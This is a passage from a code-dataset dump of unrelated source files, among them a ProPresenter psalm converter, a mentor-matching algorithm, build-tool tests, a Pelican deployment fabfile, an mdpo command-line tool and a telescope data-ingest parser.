motionEnabled=\"0\" motionDuration=\"20\" motionSpeed=\"100\">'\n\n\ndef HeaderBlock(Name='New Song',\n Authors='',\n Artist='',\n CCLICopyRightInfo='',\n CCLILicenceNumber='',\n Publisher='',\n Notes='',\n height=\"1080\",\n width=\"1920\",\n category=\"\"):\n\n return '<_-RVProTransitionObject-_transitionObject transitionType=\"-1\" transitionDuration=\"1\" motionEnabled=\"0\" motionDuration=\"20\" motionSpeed=\"100\">'\n\n\nFooterBlock = ''\n\n\ndef write_prop(psalm, screen_size, font_colour, background_colour, underline, extra_slide, output_folder):\n to_write = \"\"\n if extra_slide:\n psalm['stanzas'] = [\"\"] + psalm['stanzas']\n for v in psalm['stanzas']:\n if not underline:\n v = remove_markup(v)\n\n to_write += SlideBlock(\n v,\n screen_size,\n font_colour,\n background_colour\n )\n\n if psalm['book'] == \"Sing Psalms\":\n copyright_field = \"Free Church of Scotland\"\n else:\n copyright_field = \"\"\n # Prepare Header Block to write:\n to_write_header = HeaderBlock(\n Name=psalm['name'],\n Artist='',\n CCLILicenceNumber='',\n Notes=psalm['metre'],\n CCLICopyRightInfo=copyright_field,\n Publisher='',\n Authors=psalm['book'],\n height=screen_size[0],\n width=screen_size[1],\n category=psalm['book'])\n to_write = to_write_header + \\\n '' + \\\n to_write + \\\n '' + \\\n FooterBlock\n # Now actually write the thing.\n with open(os.path.join(output_folder, psalm['file_name'] + '.pro5'), 'w') as f:\n f.write(to_write)\n\n\ndef convert2propresenter(screen_size=(\"1080\", \"1920\"), font_colour=('0', '0', '0'), background_colour=('1', '1', '1', '1'), colour_name='b_w', underline=False, extra_slide=False):\n \"\"\"Convert Psalms to propresenter files.\"\"\"\n ratio = \"x\".join(screen_size)\n folder_ids = [ratio, colour_name]\n if underline:\n folder_ids.append(\"underlined\")\n if extra_slide:\n folder_ids.append(\"stcs\")\n # sing psalms\n file_name = \"Sing Psalms\"\n output_folder = make_output_folder([\"ProPresenter5\", '_'.join(folder_ids), file_name])\n psalms = load_sing_psalms()\n for psalm in psalms:\n write_prop(psalm, screen_size, font_colour, background_colour, underline, extra_slide, output_folder)\n\n # scottish psalter\n file_name = \"Scottish Psalter\"\n output_folder = make_output_folder([\"ProPresenter5\", '_'.join(folder_ids), file_name])\n psalms = load_scottish_psalter()\n for psalm in psalms:\n write_prop(psalm, screen_size, font_colour, background_colour, underline, extra_slide, output_folder)\n\n zip_folder(os.path.dirname(output_folder))\n remove_folder(os.path.dirname(output_folder))\n\nif __name__ == '__main__':\n convert2propresenter()\n","sub_path":"tools/convert2propresenter.py","file_name":"convert2propresenter.py","file_ext":"py","file_size_in_byte":8584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"542634427","text":"from collections import deque\nfrom mentormatch.api.applicant.applicant_collection import ApplicantCollection\nfrom mentormatch.api.initializer.initializer_abc import Initializer\nfrom mentormatch.api.sorter.sorter_context_mgr import SorterContextMgr\n\n\nclass Matcher:\n\n def __init__(\n self,\n mentors: ApplicantCollection,\n mentees: ApplicantCollection,\n initializer: Initializer,\n ranker_context_mgr: SorterContextMgr,\n ):\n self._mentors = mentors\n self._mentees = mentees\n self._initializer = initializer\n self._sorter_context_mgr = ranker_context_mgr\n\n def execute(self) -> None:\n\n ################\n # Mentee Deque #\n ################\n unpaired_mentees = \\\n deque(filter(lambda _mentee: _mentee.is_available, self._mentees))\n self._sorter_context_mgr.set_initializing_sort()\n for mentee in unpaired_mentees:\n potential_pairs = self._initializer.get_potential_pairs(mentee)\n mentee.potential_pairs = sorted(potential_pairs)\n mentee.restart_count = 0\n\n self._sorter_context_mgr.set_matching_sort()\n while len(unpaired_mentees) > 0:\n\n ###########################\n # Get next potential pair #\n ###########################\n mentee = unpaired_mentees.pop()\n if len(mentee.potential_pairs) > 0:\n # Let's now try to pair this mentee\n pair = mentee.potential_pairs.pop()\n mentor = pair.mentor\n ##############################\n # Assign this potential pair #\n ##############################\n mentee.assign_pair(pair)\n mentor.assign_pair(pair)\n #############################\n # Resolve overloaded mentor #\n #############################\n if mentor.over_capacity:\n rejected_pair = mentor.remove_pair()\n rejected_mentee = rejected_pair.mentee\n rejected_mentee.remove_pair()\n unpaired_mentees.appendleft(rejected_mentee)\n elif mentee.favored and mentee.restart_count < 7:\n # We really want this mentee paired, so we let her go again.\n # She is more likely to get paired next time around.\n mentee.potential_pairs = \\\n self._initializer.get_potential_pairs(mentee)\n mentee.restart_count += 1\n unpaired_mentees.appendleft(mentee)\n continue\n","sub_path":"mentormatch/api/matcher/matcher.py","file_name":"matcher.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"217436504","text":"# Copyright 2017 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nimport os\n\nfrom pants.backend.jvm.subsystems.zinc import Zinc\nfrom pants.backend.jvm.targets.java_library import JavaLibrary\nfrom pants.backend.jvm.tasks.classpath_products import ClasspathProducts\nfrom pants.backend.jvm.tasks.jvm_compile.jvm_compile import JvmCompile\nfrom pants.backend.jvm.tasks.jvm_compile.zinc.zinc_compile import BaseZincCompile\nfrom pants.backend.jvm.tasks.nailgun_task import NailgunTaskBase\nfrom pants.base.build_environment import get_buildroot\nfrom pants_test.jvm.nailgun_task_test_base import NailgunTaskTestBase\n\n\nclass DummyJvmCompile(JvmCompile):\n pass\n\n\nclass JvmCompileTest(NailgunTaskTestBase):\n DEFAULT_CONF = 'default'\n\n @classmethod\n def task_type(cls):\n return DummyJvmCompile\n\n def test_if_runtime_classpath_exists(self):\n target = self.make_target(\n 'java/classpath:java_lib',\n target_type=JavaLibrary,\n sources=['com/foo/Bar.java'],\n )\n\n context = self.context(target_roots=[target])\n compile_classpath = context.products.get_data('compile_classpath', ClasspathProducts.init_func(self.pants_workdir))\n\n compile_entry = os.path.join(self.pants_workdir, 'compile-entry')\n pre_init_runtime_entry = os.path.join(self.pants_workdir, 'pre-inited-runtime-entry')\n compile_classpath.add_for_targets([target], [('default', compile_entry)])\n runtime_classpath = context.products.get_data('runtime_classpath', ClasspathProducts.init_func(self.pants_workdir))\n\n runtime_classpath.add_for_targets([target], [('default', pre_init_runtime_entry)])\n\n task = self.create_task(context)\n resulting_classpath = task.create_runtime_classpath()\n self.assertEqual([('default', pre_init_runtime_entry), ('default', compile_entry)],\n resulting_classpath.get_for_target(target))\n\n\nclass BaseZincCompileJDKTest(NailgunTaskTestBase):\n DEFAULT_CONF = 'default'\n old_cwd = os.getcwd()\n\n @classmethod\n def task_type(cls):\n return BaseZincCompile\n\n def setUp(self):\n os.chdir(get_buildroot())\n super().setUp()\n\n def tearDown(self):\n os.chdir(self.old_cwd)\n super().tearDown()\n\n def test_subprocess_compile_jdk_being_symlink(self):\n context = self.context(target_roots=[])\n zinc = Zinc.Factory.global_instance().create(context.products, NailgunTaskBase.SUBPROCESS)\n self.assertTrue(os.path.islink(zinc.dist.home))\n\n def test_hermetic_jdk_being_underlying_dist(self):\n context = self.context(target_roots=[])\n zinc = Zinc.Factory.global_instance().create(context.products, NailgunTaskBase.HERMETIC)\n self.assertFalse(\n os.path.islink(zinc.dist.home),\n \"Expected {} to not be a link, it was.\".format(zinc.dist.home)\n )\n","sub_path":"tests/python/pants_test/backend/jvm/tasks/jvm_compile/test_jvm_compile.py","file_name":"test_jvm_compile.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"404643825","text":"# xcttp://matxcworld.wolfram.com/Circle-LineIntersection.xctml\nfrom math import sqrt\n\nEPS = 1 * 10**-5\n\n\ndef distance(x1, y1, x2, y2):\n return sqrt((x2 - x1)**2 + (y2 - y1)**2)\n\n\ndef on_circle(x1, y1, x2, y2, x3, y3):\n d = distance(\n x1, y1, x3, y3\n ) + distance(x3, y3, x2, y2) - distance(x1, y1, x2, y2)\n if d < EPS:\n return True\n\n return\n\n\ndef sgn(x):\n if x < 0:\n return -1\n else:\n return 1\n\n\ndef intersection(x1, y1, x2, y2, xc, yc, r):\n x1, y1, x2, y2 = x1 - xc, y1 - yc, x2 - xc, y2 - yc # circle at (0, 0)\n\n dx = x2 - x1\n dy = y2 - y1\n dr = sqrt(dx**2 + dy**2)\n det = x1 * y2 - x2 * y1\n discriminant = r**2 * dr**2 - det**2\n\n if discriminant < 0:\n return False\n\n for i in [(1, 1), (-1, 1), (1, -1), (-1, -1)]:\n x = (det * dy + i[0] * sgn(dy)*dx*sqrt(r**2 * dr**2 - det**2)) / dr**2\n y = (-det * dx + i[1] * abs(dy) * sqrt(r**2 * dr**2 - det**2)) / dr**2\n if on_circle(x1, y1, x2, y2, x, y):\n return True\n return False\n\n\ndef main():\n t = int(input())\n\n for t_itr in range(t):\n xc, yc, r = map(int, input().rstrip().split())\n\n x1, y1 = map(int, input().rstrip().split())\n x2, y2 = map(int, input().rstrip().split())\n x3, y3 = map(int, input().rstrip().split())\n\n if any([\n intersection(x1, y1, x2, y2, xc, yc, r,),\n intersection(x1, y1, x3, y3, xc, yc, r,),\n intersection(x2, y2, x3, y3, xc, yc, r,),\n ]):\n print('YES')\n else:\n print('NO')\n\n return\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"sherlock_geometry.py","file_name":"sherlock_geometry.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"468230720","text":"import pandas as pd\nimport video_data\nimport displayData\nimport os.path\nfrom os import path\n\n\ndef main():\n\n table_name = 'VIDEOS'\n db_filename = 'videos.db'\n\n # Database not created\n if not path.exists(\"videos.db\"):\n # Read watch history data and convert to df\n watchHistory_json = 'C:\\\\Users\\\\danie\\\\Desktop\\\\CS-Projects\\\\YouTube_Screentime\\\\Takeout\\\\YouTube and YouTube Music\\\\history\\\\watch-history.json'\n watchHistory_df = pd.read_json(watchHistory_json) \n \n # Clean and format data\n df = video_data.format_takeoutData(watchHistory_df)\n \n # Pull additional data such as Category and View Count\n df = video_data.get_data(df)\n\n # Store data in .db file\n video_data.store_data(db_filename,table_name,df)\n\n \n # load data from database\n df = video_data.load_data(db_filename,table_name)\n\n # Create Dashboard and plot data \n df = df[:5000] # sample set\n displayData.plot_data(df)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"324697074","text":"# coding=utf-8\r\nfrom pandas import DataFrame\r\nfrom trade import TradeInfo\r\nfrom trade.policy import DefaultTradePolicy\r\nfrom trade.policy.Parameter import Param\r\n\r\n__author__ = 'Cedric Zhuang'\r\n\r\n\r\n# 交易策略\r\n#\r\n# 买入随机\r\n# 30 天内最高值 回落 15%\r\n#\r\n#\r\n# 持有天数\r\n# 2\t\t\t [-5, 5]\r\n# 5\t\t\t [-4, 7]\r\n# 10\t\t\t[-3, 10]\r\n# 15\t\t [0, 15]\r\n# 30\t\t\t[5, 30]\r\n# 60\t\t\t[5, 50]\r\n# 120\t\t\t[40, 100]\r\n# 240\t\t\t[70, 150]\r\n\r\nclass RangeTradePolicy(DefaultTradePolicy):\r\n def __init__(self):\r\n super(RangeTradePolicy, self).__init__()\r\n self.full_policy = None\r\n # set to default range policy for test\r\n self.set_range_policy({\r\n 1: [-2, 9],\r\n 2: [-4, 7],\r\n 3: [0, 1]\r\n })\r\n\r\n def get_config(self):\r\n configs = super(RangeTradePolicy, self).get_config()\r\n range_policy = Param.create(\"range_policy\", Param.Type.MAP)\r\n return configs + [range_policy]\r\n\r\n def get_pretty_range_policy(self):\r\n policy_frame = DataFrame(self.full_policy).T\r\n policy_frame.index.name = 'day'\r\n policy_frame.columns = ['cut', 'profit']\r\n # skip record zero\r\n return policy_frame[1:]\r\n\r\n def get_sell_strategy(self, holding, record, trade_days):\r\n high_percentage = (record.high - holding.price) * 100 / holding.price\r\n low_percentage = (record.low - holding.price) * 100 / holding.price\r\n sell_price = None\r\n keep = False\r\n if trade_days in self.full_policy:\r\n sell_low, sell_high = self.full_policy[trade_days]\r\n if low_percentage <= sell_low:\r\n sell_price = holding.price * (1 + sell_low / 100.0)\r\n elif high_percentage >= sell_high:\r\n sell_price = holding.price * (1 + sell_high / 100.0)\r\n else:\r\n keep = True\r\n if not RangeTradePolicy.is_price_achievable(sell_price, record):\r\n keep = True\r\n sell_price = None\r\n else:\r\n sell_price = record.open\r\n return keep, sell_price\r\n\r\n def get_buy_strategy(self, holding, record):\r\n should_buy = holding is None or holding.share == 0\r\n buy_price = None\r\n if should_buy:\r\n buy_price = record.open\r\n return should_buy, buy_price\r\n\r\n def set_range_policy(self, skeleton):\r\n self.full_policy = {0: (-100, 100)}\r\n max_days = max(skeleton.keys()) + 1\r\n for day in xrange(1, max_days):\r\n for i in xrange(day, max_days):\r\n if i in skeleton:\r\n self.full_policy[day] = skeleton[i]\r\n break\r\n\r\n def get_range_policy(self):\r\n return self.full_policy","sub_path":"source/trade/policy/RangeTradePolicy.py","file_name":"RangeTradePolicy.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"120849653","text":"from fabric.api import *\nimport fabric.contrib.project as project\nimport os\nimport shutil\nimport sys\nimport SocketServer\n\nfrom pelican.server import ComplexHTTPRequestHandler\n\n# Local path configuration (can be absolute or relative to fabfile)\nenv.deploy_path = 'output'\nDEPLOY_PATH = env.deploy_path\n\n# Remote server configuration\nproduction = 'nikolai@incolumitas.com'\ndest_path = '/var/www/incolumitas.com/'\n\n# Port for `serve`\nPORT = 8000\n\ndef clean():\n \"\"\"Remove generated files\"\"\"\n if os.path.isdir(DEPLOY_PATH):\n shutil.rmtree(DEPLOY_PATH)\n os.makedirs(DEPLOY_PATH)\n\ndef build():\n \"\"\"Build local version of site\"\"\"\n local('pelican -s pelicanconf.py')\n\ndef rebuild():\n \"\"\"`clean` then `build`\"\"\"\n clean()\n build()\n\ndef regenerate():\n \"\"\"Automatically regenerate site upon file modification\"\"\"\n local('pelican -r -s pelicanconf.py')\n\ndef serve():\n \"\"\"Serve site at http://localhost:8000/\"\"\"\n os.chdir(env.deploy_path)\n\n class AddressReuseTCPServer(SocketServer.TCPServer):\n allow_reuse_address = True\n\n server = AddressReuseTCPServer(('', PORT), ComplexHTTPRequestHandler)\n\n sys.stderr.write('Serving on port {0} ...\\n'.format(PORT))\n server.serve_forever()\n\ndef reserve():\n \"\"\"`build`, then `serve`\"\"\"\n build()\n serve()\n\ndef preview():\n \"\"\"Build production version of site\"\"\"\n local('pelican -s publishconf.py')\n\ndef reload_isso():\n local('ssh -i /home/nikolai/.ssh/root_new_server root@167.99.241.135 \"systemctl daemon-reload && systemctl restart isso && systemctl restart nginx\"')\n local('ssh -i /home/nikolai/.ssh/root_new_server root@167.99.241.135 \"/var/lib/isso/env/bin/isso --version\"')\n\n@hosts(production)\ndef isso():\n \"\"\"Publish isso to production\"\"\"\n # local('scp -i /home/nikolai/.ssh/root_new_server /home/nikolai/projects/work/backups/var/lib/isso/comments.db root@167.99.241.135:/var/lib/isso/comments.db')\n local('scp -i /home/nikolai/.ssh/root_new_server /home/nikolai/projects/private/incolumitas/incolumitas/isso/isso.cfg root@167.99.241.135:/etc/isso.cfg')\n local('scp -i /home/nikolai/.ssh/root_new_server /home/nikolai/projects/private/incolumitas/incolumitas/isso/isso_nginx.conf root@167.99.241.135:/etc/nginx/sites-available/isso_nginx.conf')\n # local('ssh -i /home/nikolai/.ssh/root_new_server root@167.99.241.135 \"ln -s /etc/nginx/sites-available/isso_nginx.conf /etc/nginx/sites-enabled/isso_nginx.conf\"')\n local('scp -i /home/nikolai/.ssh/root_new_server /home/nikolai/projects/private/incolumitas/incolumitas/isso/isso.service root@167.99.241.135:/etc/systemd/system/isso.service')\n reload_isso()\n\n@hosts(production)\ndef publish2():\n \"\"\"Publish to production via rsync\"\"\"\n local('pelican -s publishconf.py')\n local(\"\"\"rsync -avc --delete -e \"ssh -i /home/nikolai/.ssh/root_new_server\" output/ root@167.99.241.135:/var/www/incolumitas.com/\"\"\")\n local('ssh -i /home/nikolai/.ssh/root_new_server root@167.99.241.135 \"chown -R www-data:www-data /var/www/incolumitas.com/\"')\n reload_isso()","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"588468687","text":"from curio import meta\nfrom curio import *\nimport time\n\ndef test_blocking(kernel):\n @meta.blocking\n def func():\n return 1\n\n async def main():\n r = await func()\n assert r == 1\n\n assert func() == 1\n\n kernel.run(main)\n\n@meta.cpubound\ndef cpufunc():\n return 1\n\ndef test_cpubound(kernel):\n async def main():\n r = await cpufunc()\n assert r == 1\n\n assert cpufunc() == 1\n kernel.run(main)\n\n\n \n","sub_path":"tests/test_meta.py","file_name":"test_meta.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"409526511","text":"#!/usr/bin/env python\n\n\"\"\"md2po2md command line interface.\"\"\"\n\nimport argparse\nimport sys\n\nfrom mdpo.cli import (\n add_common_cli_first_arguments,\n add_common_cli_latest_arguments,\n add_debug_option,\n add_encoding_arguments,\n add_extensions_argument,\n add_nolocation_option,\n add_pre_commit_option,\n parse_command_aliases_cli_arguments,\n)\nfrom mdpo.context import environ\nfrom mdpo.md2po2md import markdown_to_pofile_to_markdown\nfrom mdpo.md4c import DEFAULT_MD4C_GENERIC_PARSER_EXTENSIONS\n\n\nDESCRIPTION = (\n 'Translates Markdown files using PO files for a set of predefined language'\n ' codes creating multiple directories, one for each language.'\n)\n\n\ndef build_parser():\n parser = argparse.ArgumentParser(description=DESCRIPTION, add_help=False)\n add_common_cli_first_arguments(parser, quiet=False)\n parser.add_argument(\n 'input_paths_glob', metavar='GLOB', nargs='*',\n help='Glob to markdown input files to translate.'\n ' If not provided, will be read from STDIN.',\n )\n parser.add_argument(\n '-l', '--lang', dest='langs', default=[], action='append',\n help='Language codes used to create the output directories.'\n ' Can be passed multiple times.',\n metavar='LANG',\n )\n parser.add_argument(\n '-o', '--output', dest='output_paths_schema',\n required=True, type=str,\n help='Path schema for outputs, built using placeholders. There is a'\n ' mandatory placeholder for languages: \\'{lang}\\'; and one'\n ' optional for output basename: \\'{basename}\\'. For example,'\n ' for the schema \\'locale/{lang}\\', the languages \\'es\\' and'\n ' \\'fr\\' and a \\'README.md\\' as input, the next files will be'\n ' written: \\'locale/es/README.po\\', \\'locale/es/README.md\\','\n ' \\'locale/fr/README.po\\' and \\'locale/fr/README.md\\'.'\n ' Note that you can omit \\'{basename}\\', specifying a'\n ' directory for each language with \\'locale/{lang}\\' for this'\n ' example. Unexistent directories and files will be created, '\n ' so you don\\'t have to prepare the output directories before'\n ' the execution.',\n metavar='PATH_SCHEMA',\n )\n add_nolocation_option(parser)\n add_extensions_argument(parser)\n add_common_cli_latest_arguments(parser)\n add_encoding_arguments(parser)\n add_debug_option(parser)\n add_pre_commit_option(parser)\n return parser\n\n\ndef parse_options(args=[]):\n parser = build_parser()\n if '-h' in args or '--help' in args:\n parser.print_help()\n sys.exit(1)\n opts, unknown = parser.parse_known_args(args)\n\n input_paths_glob = ''\n if not sys.stdin.isatty():\n input_paths_glob += sys.stdin.read().strip('\\n')\n if isinstance(opts.input_paths_glob, list) and opts.input_paths_glob:\n input_paths_glob += opts.input_paths_glob[0]\n opts.input_paths_glob = input_paths_glob\n\n if opts.extensions is None:\n opts.extensions = DEFAULT_MD4C_GENERIC_PARSER_EXTENSIONS\n\n opts.command_aliases = parse_command_aliases_cli_arguments(\n opts.command_aliases,\n )\n\n return opts\n\n\ndef run(args=[]):\n exitcode = 0\n\n with environ(_MDPO_RUNNING='true'):\n opts = parse_options(args)\n\n kwargs = dict(\n extensions=opts.extensions,\n command_aliases=opts.command_aliases,\n debug=opts.debug,\n location=opts.location,\n po_encoding=opts.po_encoding,\n md_encoding=opts.md_encoding,\n )\n\n _saved_files_changed = markdown_to_pofile_to_markdown(\n opts.langs,\n opts.input_paths_glob,\n opts.output_paths_schema,\n _check_saved_files_changed=opts.check_saved_files_changed,\n **kwargs,\n )\n if ( # pragma: no cover\n opts.check_saved_files_changed and _saved_files_changed\n ):\n exitcode = 1\n return exitcode\n\n\ndef main():\n sys.exit(run(args=sys.argv[1:])) # pragma: no cover\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"mdpo/md2po2md/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"594290113","text":"import os\nimport re\nimport lsst.daf.base as dafBase\nfrom lsst.pipe.tasks.ingest import ParseTask\nfrom lsst.pipe.tasks.ingestCalibs import CalibsParseTask\nfrom lsst.obs.ctio0m9.ctio0m9Mapper import sanitize_date\n\n\nEXTENSIONS = [\"fits\", \"gz\", \"fz\"] # Filename extensions to strip off\n\n\ndef mjdToVisit(date_obs):\n \"\"\"Generate a visit number given a DATE-OBS\n\n @param[in] date_obs a dafBase.DateTime.MJD compliant string\n @return visit_num visit number generated from date_obs\n \"\"\"\n dt = dafBase.DateTime(date_obs, dafBase.DateTime.TAI)\n # MJD is actually the default\n mjd = dt.get(dafBase.DateTime.MJD)\n # relative to 2010-01-01, just to make the visits a tiny bit smaller\n mmjd = mjd - 55197\n # 86400s per day, so we need this resolution\n return int(1e5*mmjd)\n\n\nclass Ctio0m9ParseTask(ParseTask):\n \"\"\"Parser suitable for ctio0m9 data\n \"\"\"\n\n def getInfo(self, filename):\n \"\"\"Get information about the image from the filename and its contents.\n\n Here, scrape the basename from the filename, and then call the\n baseclass to open the image and parse the header.\n\n @param filename Name of file to inspect\n @return File properties; list of file properties for each extension\n \"\"\"\n phuInfo, infoList = ParseTask.getInfo(self, filename)\n\n # Grab the basename\n pathname, basename = os.path.split(filename)\n basename = re.sub(r\"\\.(%s)$\" % \"|\".join(EXTENSIONS), \"\", basename)\n\n phuInfo['basename'] = basename\n\n return phuInfo, infoList\n\n # Add an entry to config.parse.translators in config/ingest.py if needed\n def translate_visit(self, md):\n \"\"\"Generate a unique visit number from the timestamp\n\n @param[in] md image metadata\n \"\"\"\n return mjdToVisit(md.getScalar(\"DATE-OBS\"))\n\n def translate_imgType(self, md):\n \"\"\"Determine the type of image being taken (bias, dark etc).\n\n Get the image type (e.g. bias, dark, flat etc) from the metadata (md).\n Translator function derived from a very small dataset from the\n observatory i.e. may well need adding to when new string values are\n found.\n\n @param[in] md image metadata\n @return The image type, as mapped by the dict in this function\n \"\"\"\n val = md.getScalar(\"IMAGETYP\").rstrip().lstrip()\n conversion = {'dflat': 'flat',\n 'DFLAT': 'flat',\n 'DOME FLAT': 'flat',\n 'dark': 'dark',\n 'zero': 'bias',\n 'BIAS': 'bias',\n 'Focus': 'focus',\n 'FOCUS': 'focus',\n 'sflat': 'flat',\n 'object': 'object',\n 'OBJECT': 'object'}\n\n if val in conversion:\n return conversion[val]\n else:\n self.log.warn('Unknown image type %s found in IMAGETYP key', val)\n return None\n\n def translate_wavelength(self, md):\n \"\"\"Get the illumination wavelength.\n\n Get the monochromator wavelength from the header, for flats only.\n Method will need ammending if/when this value is written elsewhere\n\n @param[in] md image metadata\n @return wavelength in nm\n \"\"\"\n val = md.getScalar(\"OBJECT\").rstrip().lstrip()\n if self.translate_imgType(md) != 'flat':\n return float('nan') # defaults to NaN if not a flat\n if val[0:4].isdigit():\n wavelength = float(val[0:4])\n elif val[0:3].isdigit():\n wavelength = float(val[0:3])\n # We don't know what might be stored here,\n # so a little sanity checking is good\n if wavelength < 300 or wavelength > 1150:\n self.log.warn('Found a wavelength of %s, '\n 'which lies outside of the expected range.', wavelength)\n return wavelength\n return float('nan')\n\n def _translate_filter(self, val):\n \"\"\"Definition of the filter sanitization mappings.\n Add values to the dictionary as needed when new values are found in\n the data\"\"\"\n conversion = {'SEMROCK': 'SEMROCK',\n 'Semrock': 'SEMROCK',\n 'RONCHI400': 'RONCHI400',\n 'RONCHI200': 'RONCHI200',\n 'ronchi': 'RONCHI200',\n 'Ronchi': 'RONCHI200',\n 'RONCHI': 'RONCHI200',\n 'NONE': 'NONE',\n 'no_filter': 'NONE',\n 'OPEN': 'NONE',\n 'CLEAR': 'NONE',\n 'clear': 'NONE',\n 'Clear': 'NONE',\n 'OPEN5': 'NONE',\n 'OPEN8': 'NONE',\n 'dia': 'NONE',\n 'FGB37': 'FGB37',\n 'FGC715S': 'FGC715S',\n 'u': 'u',\n 'g': 'g',\n 'r': 'r',\n 'i': 'i',\n 'z': 'z',\n 'nv': 'nv',\n 'b': 'b',\n 'cb': 'cb',\n 'RG715': 'RG715',\n 'f5025/1023': 'f5025/1023',\n 'Halfa': 'Halfa',\n 'ZG': 'ZG',\n 'FREE': 'NONE',\n 'free': 'NONE',\n 'Thor300': 'Thor300',\n 'Ron200': 'RONCHI200',\n 'Ron400': 'RONCHI400',\n 'HoloPhP': 'HoloPhP',\n 'HoloAmAg': 'HoloAmAg',\n 'HoloPhAg': 'HoloPhAg',\n }\n\n if val in conversion:\n return conversion[val]\n else:\n self.log.warn('Unmapped filter type %s found when translating filter', val)\n # avoiding using None, as this is an alias for clear/no_filter\n return 'UNKNOWN_FILTER'\n\n def translate_filter(self, md):\n \"\"\"Generate the standardised composite name of the two filters.\n\n Map the filters used to a standard name, and concatenate as a string,\n so that flats can be generated for each filter pair easily. Individual\n filter name sanitisation is done by the _translate_filter() function\n so it only has to be defined in one place.\n\n @param[in] md image metadata\n @return sanitized and concatenated filter name\n \"\"\"\n filt1 = self._translate_filter(md.getScalar(\"FILTER1\").rstrip().lstrip())\n filt2 = self._translate_filter(md.getScalar(\"FILTER2\").rstrip().lstrip())\n sorted_filter = [filt1, filt2]\n # we want to be insensitive to filter order, for now at least\n sorted_filter.sort()\n filter_name = '+'.join(_ for _ in sorted_filter)\n return filter_name\n\n def translate_dateobs(self, md):\n \"\"\"Translate the non-compliant DATE-OBS values\n\n @param[in] md image metadata\n @return compliant DATE-OBS string\n \"\"\"\n md = sanitize_date(md)\n return md.getScalar('DATE-OBS')\n\n def translate_filter1(self, md):\n \"\"\"Standardize the filter naming.\n\n Map the filter used to a standard name for the filter, as defined in\n the _translate_filter() function.\n\n @param[in] md image metadata\n @return sanitized filter name\n \"\"\"\n val = md.getScalar(\"FILTER1\").rstrip().lstrip()\n return self._translate_filter(val)\n\n def translate_filter2(self, md):\n \"\"\"Standardize the filter naming.\n\n Map the filter used to a standard name for the filter, as defined in\n the _translate_filter() function.\n\n @param[in] md image metadata\n @return sanitized filter name\n \"\"\"\n val = md.getScalar(\"FILTER2\").rstrip().lstrip()\n return self._translate_filter(val)\n\n\nclass Ctio0m9CalibsParseTask(CalibsParseTask):\n \"\"\"Parser for calibs\"\"\"\n\n def _translateFromCalibId(self, field, md):\n \"\"\"Get a value from the CALIB_ID written by constructCalibs\"\"\"\n data = md.getScalar(\"CALIB_ID\")\n match = re.search(r\".*%s=(\\S+)\" % field, data)\n return match.groups()[0]\n\n def translate_filter(self, md):\n \"\"\"Translate the filter name\n @param[in] md image metadata\n @return translated filter name\n \"\"\"\n return self._translateFromCalibId(\"filter\", md)\n\n def translate_calibDate(self, md):\n \"\"\"Translate the calib date\n @param[in] md image metadata\n @return translated calib date\n \"\"\"\n return self._translateFromCalibId(\"calibDate\", md)\n\n def translate_ccd(self, md):\n \"\"\"Return the CCD number\n @param[in] md image metadata, unused\n @return 0\n \"\"\"\n return 0\n","sub_path":"python/lsst/obs/ctio0m9/ingest.py","file_name":"ingest.py","file_ext":"py","file_size_in_byte":8833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"147113009","text":"from os import linesep\n\nkeywords = {\n \" ?VYBER \": \"SELECT \",\n \" ?UPDATE \": \" AKTUALIZUJ \",\n \" ?VLOŽ DO \": \"INSERT INTO \",\n \" ?VYTVOŘ DATABÁZI \": \"CREATE DATABASE \",\n \" ?UPRAV DATABÁZI \": \"ALTER TABLE \",\n \" ?VYTVOŘ TABULKU \": \"CREATE TABLE \",\n \" ?UPRAV TABULKU\": \"ALTER TABLE \",\n \" ?SMAŽ TABULKU \": \"DROP TABLE \",\n \" ?VYTVOŘ INDEX \": \"CREATE INDEX \",\n \" ?SMAŽ INDEX \": \"DROP INDEX \",\n \" Z \": \" FROM \",\n \" KDE \": \" WHERE \",\n \" A \": \" AND \",\n \" NEBO \": \" OR \",\n \" NEPLATÍ \": \" NOT \",\n \" SEŘAĎ PODLE \": \" ORDER BY \",\n \" HODNOTY \": \" VALUES \",\n \" JE PRÁZDNÝ \": \" NULL \",\n \" NASTAV \": \" SET \",\n \" ?SMAŽ \": \"DELETE \",\n \" PŘIPOJ ZLEVA \": \" LEFT JOIN \",\n \" PŘIPOJ ZPRAVA \": \" RIGHT JOIN \",\n \" PŘIPOJ CELÉ \": \" FULL JOIN \",\n \" PŘIPOJ VNITŘNĚ \": \" INNER JOIN \",\n \" VŠE \": \" * \",\n f\"\\. |({linesep})\": \";\"\n }\n","sub_path":"src/translator/keywords.py","file_name":"keywords.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"515006498","text":"import os\nimport gc\nfrom multiprocessing import Pool\nimport queue\nfrom concurrent.futures import ThreadPoolExecutor\nimport 